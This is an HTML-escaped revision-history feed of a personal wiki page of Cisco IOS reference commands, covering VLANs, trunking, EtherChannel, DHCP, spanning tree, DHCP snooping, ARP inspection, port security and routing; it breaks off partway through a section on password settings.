== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example using the default administrative distance value.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Manually define a path to a remote network and specify the administrative distance.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative-distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure a Fully Specified Static Route ===&lt;br /&gt;
A fully specified static route includes both the next-hop IP address and the exit interface. This is commonly used on multi-access networks.&lt;br /&gt;
&lt;br /&gt;
Example:&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 GigabitEthernet0/0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
You can also specify the administrative distance:&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 GigabitEthernet0/0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;exit-interface&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative-distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
 ipv6 route ::/0 2001:ABC:33:44::1&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
Chart pulled from https://en.wikipedia.org/wiki/Administrative_distance#Default_administrative_distances&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
! Routing protocol !! Administrative distance&lt;br /&gt;
|-&lt;br /&gt;
| Directly connected interface || 0 (Only the interface itself has an administrative distance of 0, since a route cannot have a distance of less than 1.)&lt;br /&gt;
|-&lt;br /&gt;
| Static route || 1&lt;br /&gt;
|-&lt;br /&gt;
| Dynamic Mobile Network Routing (DMNR) || 3&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP summary route || 5&lt;br /&gt;
|-&lt;br /&gt;
| External BGP || 20&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP internal route || 90&lt;br /&gt;
|-&lt;br /&gt;
| IGRP || 100&lt;br /&gt;
|-&lt;br /&gt;
| Open Shortest Path First (OSPF) || 110&lt;br /&gt;
|-&lt;br /&gt;
| Intermediate System to Intermediate System (IS-IS) || 115&lt;br /&gt;
|-&lt;br /&gt;
| Routing Information Protocol (RIP) || 120&lt;br /&gt;
|-&lt;br /&gt;
| Exterior Gateway Protocol (EGP) || 140&lt;br /&gt;
|-&lt;br /&gt;
| On Demand Routing (ODR) || 160&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP external route || 170&lt;br /&gt;
|-&lt;br /&gt;
| Internal BGP || 200&lt;br /&gt;
|-&lt;br /&gt;
| Next Hop Resolution Protocol (NHRP) || 250&lt;br /&gt;
|-&lt;br /&gt;
| Default static route learned via DHCP || 254&lt;br /&gt;
|-&lt;br /&gt;
| Unknown and unused || 255 (An administrative distance of 255 causes the router to remove the route from the routing table and not use it.)&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1125</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1125"/>
		<updated>2026-02-23T22:43:32Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Administrative Distance */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
